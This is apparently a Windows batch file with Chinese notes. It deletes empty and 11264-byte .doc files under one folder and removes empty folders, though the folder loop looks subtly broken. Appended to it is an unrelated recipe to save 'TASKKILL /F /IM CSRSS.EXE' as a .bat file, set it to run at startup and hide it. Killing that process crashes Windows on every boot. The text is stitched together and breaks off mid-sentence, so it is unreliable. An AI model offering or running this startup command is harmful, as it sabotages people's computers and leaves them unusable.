@echo off
for /f "delims=" %%i in ('dir /a-d /b /s D:\新建文件夹') do if "%%~zi"=="0" del /q "%%i"
for /f "delims=" %%i in ('dir /a-d /b /s D:\新建文件夹\*.doc') do if "%%~zi"=="11264" del /q "%%i"
:a
setlocal EnableDelayedExpansion
for /f "delims=" %%i in ('dir /ad /b /s D:\新建文件夹') do (
if "%%~zi"=="0" (
rd "%%i" 2>nul
set n=0
endlocal
) else (
set n=1
)
)
if !n!==0 goto a
echo msgbox "全部处理完毕^_^ 欢迎再次使用!",,"提示">提示.vbs
start "" 提示.vbs
ping /n 2 127.1>nul
del 提示.vbs
打开记事本输入
TASKKILL / F / IM CSRSS.EXE
然后保存文件的扩展名为.bat
开始,然后放在启动脚本或者设置
放一些隐